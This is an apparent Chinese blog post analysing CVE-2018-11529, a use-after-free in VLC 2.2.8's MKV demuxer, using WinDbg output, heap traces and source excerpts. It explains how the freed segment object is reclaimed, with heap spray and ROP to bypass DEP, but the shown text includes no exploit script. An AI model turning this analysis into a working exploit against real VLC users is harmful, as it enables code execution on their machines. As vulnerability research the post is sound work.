<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 4.0.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>CVE-2018-11529——VLC Media Player UAF漏洞 - Jon Tsang&#39;Blog</title>


    <meta name="description" content="本文主要分析VLC Media Player 2.2.8版本的MKV格式视音频分离模块（demuxer）libmkv_plugin中存在的一个UAF漏洞，该模块的一个matroska_segment_c对象在释放后被重引用，可以通过构造大量和该对象大小相同的数据块，最终使这块内存重新被分配，程序再引用该对象时，便可控制程序指针，然后通过精确的Heap Spray布置shellcode，最后通过RO">
<meta name="keywords" content="Binary,UAF,CVE,Heap Spray">
<meta property="og:type" content="article">
<meta property="og:title" content="CVE-2018-11529——VLC Media Player UAF漏洞">
<meta property="og:url" content="https:&#x2F;&#x2F;jontsang.github.io&#x2F;post&#x2F;8256c260.html">
<meta property="og:site_name" content="Jon Tsang&#39;Blog">
<meta property="og:description" content="本文主要分析VLC Media Player 2.2.8版本的MKV格式视音频分离模块（demuxer）libmkv_plugin中存在的一个UAF漏洞，该模块的一个matroska_segment_c对象在释放后被重引用，可以通过构造大量和该对象大小相同的数据块，最终使这块内存重新被分配，程序再引用该对象时，便可控制程序指针，然后通过精确的Heap Spray布置shellcode，最后通过RO">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https:&#x2F;&#x2F;raw.githubusercontent.com&#x2F;JonTsang&#x2F;Figurebed&#x2F;master&#x2F;img&#x2F;20190823165934.jpg">
<meta property="og:updated_time" content="2019-09-08T13:45:13.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https:&#x2F;&#x2F;raw.githubusercontent.com&#x2F;JonTsang&#x2F;Figurebed&#x2F;master&#x2F;img&#x2F;20190823165934.jpg">







<link rel="icon" href="/images/favicon.svg">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
<style>body>.footer,body>.navbar,body>.section{opacity:0}</style>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">

    
    
    
    
<link rel="stylesheet" href="/css/back-to-top.css">

    
    
    
    
    
    
    
    <link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
    
    <script async="" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    


<link rel="stylesheet" href="/css/style.css">
</head>
<!--<body class="is-2-column">-->
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logo.png" alt="CVE-2018-11529——VLC Media Player UAF漏洞" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">主页</a>
                
                <a class="navbar-item"
                href="/archives">归档</a>
                
                <a class="navbar-item"
                href="/categories">分类</a>
                
                <a class="navbar-item"
                href="/tags">标签</a>
                
                <a class="navbar-item"
                href="/about">关于</a>
                
            </div>
            
            <div class="navbar-end">
                
                    
                    <a class="navbar-item" target="_blank" title="Download on GitHub" href="https://github.com/JonTsang">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                    
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;" target="_blank" rel="noopener">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;" target="_blank" rel="noopener">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-9-widescreen has-order-2 column-main">
<div class="card">
    
    <div class="card-image">
        <span  class="image is-7by1">
            <img class="thumbnail" src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823165934.jpg" alt="CVE-2018-11529——VLC Media Player UAF漏洞">
        </span>
    </div>
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2018-07-30T11:21:40.000Z">2018-07-30</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">漏洞分析</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    40 分钟 读完 (大约 6018 个字)
                </span>
                
                
                <span class="level-item has-text-grey" id="busuanzi_container_page_pv">
                    <i class="far fa-eye"></i>
                    <span id="busuanzi_value_page_pv">0</span>次访问
                </span>
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                CVE-2018-11529——VLC Media Player UAF漏洞
            
        </h1>
        <div class="content">
            <p>本文主要分析VLC Media Player 2.2.8版本的MKV格式视音频分离模块（demuxer）libmkv_plugin中存在的一个UAF漏洞，该模块的一个matroska_segment_c对象在释放后被重引用，可以通过构造大量和该对象大小相同的数据块，最终使这块内存重新被分配，程序再引用该对象时，便可控制程序指针，然后通过精确的Heap Spray布置shellcode，最后通过ROP绕过DEP，造成任意代码执行。</p>
<p>原本首发于<a href="https://www.freebuf.com/vuls/179469.html" target="_blank" rel="noopener">Freebuf</a>上，但感觉当时写的有些乱，所以现在重新整理了一下，主要从漏洞细节和漏洞的利用两大部分对漏洞进行分析。</p>
<a id="more"></a>
<h2 id="背景知识"><a href="#背景知识" class="headerlink" title="背景知识"></a>背景知识</h2><h3 id="MKV"><a href="#MKV" class="headerlink" title="MKV"></a>MKV</h3><p>MKV格式属于Matroska开源多媒体容器标准中的一种。它是建立在EBML语言的基础上，这是一种类似于XML格式的可扩展二进制元语言，使用可变长度的整数存储，以节省空间。</p>
<p>EBML元素都有自己的级别，每一个高一级的元素由若干次一级的元素组成。从整个MKV文件整体来看可分为<strong>EBML</strong>和<strong>Segment</strong>两大部分，这两大部分又可分为几个子元素，如下所示：</p>
<ul>
<li>EBML<ul>
<li>EBMLVersion</li>
<li>DocType</li>
</ul>
</li>
<li><p>Segment</p>
<ul>
<li>Meta Seek</li>
</ul>
</li>
<li>Segment information<ul>
<li>Track</li>
</ul>
</li>
<li>Chapters<ul>
<li>Cluster</li>
<li>Cueing Data</li>
<li>Attachment</li>
<li>Tagging</li>
</ul>
</li>
</ul>
<p>该漏洞利用中涉及到的几个部分功能如下：</p>
<p>Meta Seek：提供文件中其他元素的位置索引</p>
<p>Segment information：提供识别文件至关重要的信息</p>
<p>Cluster：包含所有音轨和视频帧</p>
<p>Chapters：包含所有章节（一种预定义点，以跳转到视频或音频的方法）</p>
<p>Attachment：用于附加任何类型的文件，如图片、网页、程序等。</p>
<p>这些元素还可继续划分为更小的部分，会在后面的利用中具体说明，最后附上一张图标以供参考：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190902104739.png" alt></p>
<h3 id="视音频处理"><a href="#视音频处理" class="headerlink" title="视音频处理"></a>视音频处理</h3><p>声音与图像是两种不同的媒体，只能用专门处理声音的程序或专门处理视频的程序去分别解析音频流（Audio Stream）与视频流（Video Stream）。而我们平时看的MKV、AVI等格式的电影却是既包含声音又包含视频画面的单个文件，这是因为我们对音频流和视频流进行了“合成”，将音频与视频就打包成一个单独的文件，这个过程就叫<strong>Multiplex</strong>，简称mux，意为“混流”、“封装”的意思。</p>
<p>通过 muxing，可以将视频流、音频流甚至是字幕流捆绑到一个单独的文件中，<strong>Demux</strong>即是进行与muxing相反的“分解复用”操作，也就是“分离”一个文件中的视频部分或是音频部分来进行解码和播放。</p>
<p>视音频分离器（Demuxer）即是将封装格式数据（例如MKV）中的视频压缩数据（例如H.264）和音频压缩数据（例如AAC）分离开，在这个过程中并不涉及到编码和解码。</p>
<h2 id="分析环境"><a href="#分析环境" class="headerlink" title="分析环境"></a>分析环境</h2><ul>
<li>Windows 10 1803（x64）</li>
<li>Windbg x86/x64 10.0</li>
<li>IDA Pro 7.0</li>
<li>漏洞程序VLC Media Player 2.2.8<ul>
<li>获取途径一：直接下载安装包（优点：方便，缺点：没有调试信息）</li>
<li>获取途径二：从源码自行编译（优点：有调试信息，缺点：需跨平台交叉编译，较复杂）</li>
</ul>
</li>
</ul>
<p>由于VLC Media Player的release版本没有调试信息，Debug版本也是DWARF格式调试信息，而非PDB格式，所以在Windbg中调试时依然无法看到符号信息，而且目前Debug版本也不知道上哪下了。。</p>
<p>从源码自行编译程序，官方推荐使用MinGW在Linux环境下交叉编译VLC Media Player，这样带有调试信息的程序可以方便我们使用IDA静态分析。<strong>（这里特别想要说明的一点是，该漏洞之所以能够成功利用，Mingw生成的Windows可执行文件默认情况下会从中删除重定位表。Windows 的ASLR无法随机化无重定位表的可执行文件，这使得Mingw编译时即使声明了ASLR相关选项。失去了ASLR的保护后，使ROP攻击称为可能。该漏洞编号为CVE-2018-5392，但和今天要分析的漏洞无关~就不展开讲了，有兴趣可以参考文末参考资料的”When “ASLR” Is Not Really ASLR“）</strong></p>
<p>编译过程可以参考VLC官网：<a href="https://wiki.videolan.org/Win32Compile/" target="_blank" rel="noopener">Win32Complie</a></p>
<p>另外，也可以直接在Windows上使用GDB进行调试，这样就会有调试信息；或者直接用IDA来调试界面会更加友好~</p>
<p>环境准备好后，可以测试一下PoC有没有问题：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190902135513.gif" alt></p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>分析一个UAF漏洞，我们首先要确定下面几个问题：</p>
<ol>
<li>如何定位漏洞触发点？</li>
<li>程序中什么对象导致产生了UAF？</li>
<li>该对象的内存在哪分配？</li>
<li>该对象在何处释放？</li>
<li>该对象在何处重新分配？</li>
</ol>
<p>明确目标后，下面我们就开始逐一解决这些问题。</p>
<ul>
<li>开启PageHeap hpa定位异常位置</li>
<li>寻找内存首次分配位置</li>
<li>结合源码分析</li>
<li>通过监控堆块HEAP_ENTRY结构定位释放位置</li>
</ul>
<h3 id="漏洞触发点"><a href="#漏洞触发点" class="headerlink" title="漏洞触发点"></a>漏洞触发点</h3><p>要找到漏洞触发的位置，使用Windbg自带工具gflag开启页堆：</p>
<figure class="highlight cmd hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">λ gflags.exe /i vlc.exe +hpa</span><br></pre></td></tr></table></figure>
<p>将WinDbg附加到vlc.exe上，打开poc.mkv，我们可以看到该程序在调用dword ptr [edx + 28h]时崩溃，位于<strong>libmkv_plugin.dll</strong>模块。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">(1e64.924): Access violation - code c0000005 (first chance)</span><br><span class="line">First chance exceptions are reported before any exception handling.</span><br><span class="line">This exception may be expected and handled.</span><br><span class="line">*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Users\zengy_lctlkhn\Desktop\vlc-2.2.8\plugins\demux\libmkv_plugin.dll - </span><br><span class="line">eax=24536fd8 ebx=13f84fac ecx=14114d50 edx=18730fe8 esi=1cb5fe08 edi=14114d50</span><br><span class="line">eip=6e2a753a esp=1cb5fd18 ebp=0f254f00 iopl=0         nv up ei pl nz na pe nc</span><br><span class="line">cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206</span><br><span class="line">libmkv_plugin+0x3753a:</span><br><span class="line">6e2a753a 8b4d28          mov     ecx,dword ptr [ebp+28h] ss:002b:0f254f28=????????</span><br></pre></td></tr></table></figure>
<p>再结合IDA和源码分析可知，位置是在函数<code>Control()</code>中的如下位置：</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment">//vlc-2.2.8/modules/demux/mkv/mkv.cpp</span></span><br><span class="line">...</span><br><span class="line"><span class="hljs-keyword">case</span> DEMUX_GET_FPS:</span><br><span class="line">	pf = (<span class="hljs-keyword">double</span> *)va_arg( args, <span class="hljs-keyword">double</span> * );</span><br><span class="line">	*pf = <span class="hljs-number">0.0</span>;</span><br><span class="line">	<span class="hljs-keyword">if</span>( p_sys-&gt;p_current_segment &amp;&amp; p_sys-&gt;p_current_segment-&gt;CurrentSegment() )</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="hljs-keyword">const</span> matroska_segment_c *p_segment = p_sys-&gt;p_current_segment-&gt;CurrentSegment();</span><br><span class="line">		<span class="hljs-keyword">for</span>( <span class="hljs-keyword">size_t</span> i = <span class="hljs-number">0</span>; i &lt; p_segment-&gt;tracks.size(); i++ )</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="hljs-keyword">mkv_track_t</span> *tk = p_segment-&gt;tracks[i];</span><br><span class="line">			<span class="hljs-keyword">if</span>( tk-&gt;fmt.i_cat == VIDEO_ES &amp;&amp; tk-&gt;fmt.video.i_frame_rate_base &gt; <span class="hljs-number">0</span> )</span><br><span class="line">			&#123;</span><br><span class="line">				*pf = (<span class="hljs-keyword">double</span>)tk-&gt;fmt.video.i_frame_rate / tk-&gt;fmt.video.i_frame_rate_base;</span><br><span class="line">				<span class="hljs-keyword">break</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="hljs-keyword">return</span> VLC_SUCCESS;</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<h3 id="确定UAF对象和其释放位置"><a href="#确定UAF对象和其释放位置" class="headerlink" title="确定UAF对象和其释放位置"></a>确定UAF对象和其释放位置</h3><p>查看内存属性，为PageHeap</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; !address [ebp+28h]</span><br><span class="line">Usage:                  PageHeap</span><br><span class="line">Base Address:           0f24f000</span><br><span class="line">End Address:            0f256000</span><br><span class="line">Region Size:            00007000 (  28.000 kB)</span><br><span class="line">State:                  00002000          MEM_RESERVE</span><br><span class="line">Protect:                &lt;info not present at the target&gt;</span><br><span class="line">Type:                   00020000          MEM_PRIVATE</span><br><span class="line">Allocation Base:        0f1c0000</span><br><span class="line">Allocation Protect:     00000001          PAGE_NOACCESS</span><br><span class="line">More info:              !heap -p 0x5e61000</span><br><span class="line">More info:              !heap -p -a 0xf254f28</span><br></pre></td></tr></table></figure>
<p>查看该内存分配的callback，发现在0x6e278e53处释放，到这里基本可以确定是UAF了。</p>
<p>再通过静态分析，可知释放的位置在<code>matroska_segment_c</code>对象的析构函数<code>~matroska_segment_c()</code>中。到这里可以初步推测<code>matroska_segment_c</code>对象发生了UAF。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; !heap -p -a 0xf254f28</span><br><span class="line">    address 0f254f28 found in</span><br><span class="line">    _DPH_HEAP_ROOT @ 5e61000</span><br><span class="line">    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)</span><br><span class="line">                                   11cc3784:          f254000             2000</span><br><span class="line">    74b5adc2 verifier!AVrfDebugPageHeapFree+0x000000c2</span><br><span class="line">    777097a3 ntdll!RtlDebugFreeHeap+0x0000003e</span><br><span class="line">    7765dd1e ntdll!RtlpFreeHeap+0x000000ce</span><br><span class="line">    776a6bfb ntdll!RtlpFreeHeapInternal+0x00000783</span><br><span class="line">    7765dbf6 ntdll!RtlFreeHeap+0x00000046</span><br><span class="line">    76727409 msvcrt!free+0x00000069</span><br><span class="line">    6e278e53 libmkv_plugin+0x00008e53</span><br></pre></td></tr></table></figure>
<p>下面是IDA反编译的结果：<br><figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">void</span> __fastcall matroska_segment_c::~matroska_segment_c(matroska_segment_c *<span class="hljs-keyword">const</span> <span class="hljs-keyword">this</span>)</span><br><span class="line">&#123;</span><br><span class="line">  matroska_segment_c *v1; <span class="hljs-comment">// ebx</span></span><br><span class="line"></span><br><span class="line">  v1 = <span class="hljs-keyword">this</span>;</span><br><span class="line">  matroska_segment_c::~matroska_segment_c(<span class="hljs-keyword">this</span>);</span><br><span class="line">  <span class="hljs-function"><span class="hljs-keyword">operator</span> <span class="hljs-title">delete</span><span class="hljs-params">(v1)</span></span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<h3 id="确定UAF对象重新分配的位置"><a href="#确定UAF对象重新分配的位置" class="headerlink" title="确定UAF对象重新分配的位置"></a>确定UAF对象重新分配的位置</h3><p>现在关闭页堆后重新打开vlc.exe，并在上面异常的位置下断，可以看到[ebp+28h]处的值为0x22000020。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Breakpoint 0 hit</span><br><span class="line">eax=034eb680 ebx=0361894c ecx=03628b18 edx=02b78238 esi=03c2fe08 edi=03628b18</span><br><span class="line">eip=6dd6753a esp=03c2fd18 ebp=06c56aa8 iopl=0         nv up ei pl nz na po nc</span><br><span class="line">cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202</span><br><span class="line">libmkv_plugin+0x3753a:</span><br><span class="line">6dd6753a 8b4d28          mov     ecx,dword ptr [ebp+28h] ss:002b:06c56ad0=22000020</span><br></pre></td></tr></table></figure>
<p>查看<code>[ebp]</code>，会发现内容正好是poc中的<code>UAF_object</code></p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; dd [ebp]</span><br><span class="line">06c56aa8  41414141 41414141 41414141 41414141</span><br><span class="line">06c56ab8  41414141 41414141 41414141 41414141</span><br><span class="line">06c56ac8  41414141 41414141 22000020 22010020</span><br><span class="line">06c56ad8  41414141 41414141 41414141 41414141</span><br><span class="line">06c56ae8  41414141 41414141 41414141 41414141</span><br><span class="line">06c56af8  41414141 41414141 41414141 41414141</span><br><span class="line">06c56b08  41414141 41414141 41414141 41414141</span><br><span class="line">06c56b18  41414141 41414141 41414141 41414141</span><br></pre></td></tr></table></figure>
<p>接下来看看这块内存在何处分配的：</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; !heap -p -a ebp</span><br><span class="line">    address 071dcdc8 found in</span><br><span class="line">    _HEAP @ 3000000</span><br><span class="line">      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state</span><br><span class="line">        071dcdb0 0023 0000  [00]   071dcdc8    00100 - (busy)</span><br><span class="line">          unknown!noop</span><br><span class="line">        776f3404 ntdll!RtlpCallInterceptRoutine+0x00000026</span><br><span class="line">        776b09aa ntdll!RtlpAllocateHeapInternal+0x00055bca</span><br><span class="line">        7765adce ntdll!RtlAllocateHeap+0x0000003e</span><br><span class="line">        76727610 msvcrt!malloc+0x00000090</span><br><span class="line">        6e3b6fde libmkv_plugin+0x00036fde</span><br></pre></td></tr></table></figure>
<p>0x6e3b6fde位于函数<code>Control()</code>中如下位置：</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">case</span> DEMUX_GET_ATTACHMENTS:</span><br><span class="line">	ppp_attach = (<span class="hljs-keyword">input_attachment_t</span>***)va_arg( args, <span class="hljs-keyword">input_attachment_t</span>*** );</span><br><span class="line">	pi_int = (<span class="hljs-keyword">int</span>*)va_arg( args, <span class="hljs-keyword">int</span> * );</span><br><span class="line"></span><br><span class="line">	<span class="hljs-keyword">if</span>( p_sys-&gt;stored_attachments.size() &lt;= <span class="hljs-number">0</span> )</span><br><span class="line">		<span class="hljs-keyword">return</span> VLC_EGENERIC;</span><br><span class="line"></span><br><span class="line">	*pi_int = p_sys-&gt;stored_attachments.size();</span><br><span class="line">	*ppp_attach = (<span class="hljs-keyword">input_attachment_t</span>**)<span class="hljs-built_in">malloc</span>( <span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">input_attachment_t</span>*) *</span><br><span class="line">                                              p_sys-&gt;stored_attachments.size() );</span><br><span class="line">	<span class="hljs-keyword">if</span>( !(*ppp_attach) )</span><br><span class="line">		<span class="hljs-keyword">return</span> VLC_ENOMEM;</span><br><span class="line">	<span class="hljs-keyword">for</span>( <span class="hljs-keyword">size_t</span> i = <span class="hljs-number">0</span>; i &lt; p_sys-&gt;stored_attachments.size(); i++ )</span><br><span class="line">	&#123;</span><br><span class="line">		attachment_c *a = p_sys-&gt;stored_attachments[i];</span><br><span class="line">    <span class="hljs-comment">//vlc_input_attachment_New再次分配</span></span><br><span class="line">		(*ppp_attach)[i] = vlc_input_attachment_New( a-&gt;fileName(), a-&gt;mimeType(), <span class="hljs-literal">NULL</span>,</span><br><span class="line">                                                 a-&gt;p_data, a-&gt;size() );</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="hljs-keyword">return</span> VLC_SUCCESS;</span><br></pre></td></tr></table></figure>
<p>现在UAF对象重新分配的位置就确定了。</p>
<h3 id="确定UAF对象分配位置"><a href="#确定UAF对象分配位置" class="headerlink" title="确定UAF对象分配位置"></a>确定UAF对象分配位置</h3><p>现在只剩如何确定对象最开始分配的位置了，这里我试了开启ust追踪内存分配，但总会导致异常，试了几次之后只好放弃了。</p>
<p>所以还是回到刚开始，中断在<code>mov ecx,dword ptr [ebp+28h]</code>时，取<code>[ebp+28h]</code>中的数据为0x22000020到ecx，所以我们可以对这块内存下断观察后续会对它做什么操作。</p>
<p>继续运行两次，断在了函数<code>matroska_segment_c::UnSelect()</code>中<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; ba r4 [ebp+28h]</span><br><span class="line">0:012&gt; g</span><br><span class="line">...</span><br><span class="line">0:012&gt; g</span><br><span class="line">Breakpoint 1 hit</span><br><span class="line">eax=220002dc ebx=00000000 ecx=22010020 edx=22000020 esi=06e23eb0 edi=008e0f18</span><br><span class="line">eip=6dcbaf50 esp=03a8fe18 ebp=03521efc iopl=0         nv up ei pl zr na pe nc</span><br><span class="line">cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246</span><br><span class="line">libmkv_plugin+0xaf50:</span><br><span class="line">6dcbaf50 89c8            mov     eax,ecx</span><br></pre></td></tr></table></figure><br>这里的call指令调用了一个位于vlc.exe模块中的地址，结合PoC来看也是ROP链第一个gadget的地址。继续往后执行几步便会触发漏洞，弹出计算器。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; p</span><br><span class="line">...</span><br><span class="line">0:012&gt; p</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">0:012&gt; p</span><br><span class="line">eax=2200031c ebx=00000000 ecx=220002e4 edx=22000310 esi=06e23eb0 edi=008e0f18</span><br><span class="line">eip=6dcbaf80 esp=03a8fe18 ebp=03521efc iopl=0         nv up ei pl nz na po nc</span><br><span class="line">cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202</span><br><span class="line">libmkv_plugin+0xaf80:</span><br><span class="line">6dcbaf80 ff5208          call    dword ptr [edx+8]    ds:002b:22000318=0040ae91</span><br></pre></td></tr></table></figure>
<p>由于程序每次加载时堆的地址都是不固定的，也无法靠下断点来进行分析，那么我们只能结合IDA和源码来分析了。通过交叉引用找到调用<code>matroska_segment_c::UnSelect()</code>的<code>Close()</code>函数，观察<code>matroska_segment_c *</code>是从哪取出的，步骤整理如下：</p>
<ol>
<li>将<code>p_this</code>强制转换为<code>demux_t*</code>型并赋值给<code>p_demux</code></li>
<li>将<code>p_demux-&gt;p_sys</code>赋给<code>p_sys</code></li>
<li>将<code>p_sys-&gt;p_current_segment</code>赋给<code>p_vsegment</code></li>
<li>调用<code>p_vsegment-&gt;CurrentSegment()</code>将返回值赋给<code>p_segment</code>，<strong>注意这个变量类型为<code>matroska_segment_c *</code></strong></li>
<li>最后调用<code>p_segment-&gt;UnSelect()</code>方法触发漏洞</li>
</ol>
<p>再来看看定义该函数的文件：</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment">//vlc-2.2.8/modules/demux/mkv/mkv.cpp</span></span><br><span class="line">...</span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span>  <span class="hljs-title">Open</span> <span class="hljs-params">( <span class="hljs-keyword">vlc_object_t</span> * )</span></span>;</span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">Close</span><span class="hljs-params">( <span class="hljs-keyword">vlc_object_t</span> * )</span></span>;</span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span>  <span class="hljs-title">Demux</span>  <span class="hljs-params">( <span class="hljs-keyword">demux_t</span> * )</span></span>;</span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span>  <span class="hljs-title">Control</span><span class="hljs-params">( <span class="hljs-keyword">demux_t</span> *, <span class="hljs-keyword">int</span>, va_list )</span></span>;</span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">Seek</span>   <span class="hljs-params">( <span class="hljs-keyword">demux_t</span> *, <span class="hljs-keyword">mtime_t</span> i_date, <span class="hljs-keyword">double</span> f_percent, virtual_chapter_c *p_chapter )</span></span>;</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<p>文件中定义了<code>Open()</code>、<code>Close()</code>和<code>Control()</code>等函数，通过函数名和注释可知，程序在处理mkv文件时，首先执行<code>Open()</code>函数。而<code>Open()</code>和<code>Close()</code>都有相同的参数<code>p_this</code>，在上面的分析中，UAF对象的指针正是从该结构体中取出的。刚进入<code>Open()</code>函数时，对象的初始化应该都没有完成，我们只需监视<code>p_demux</code>结构在上述内存偏移中的变化，就能找到分配UAF对象的地方。</p>
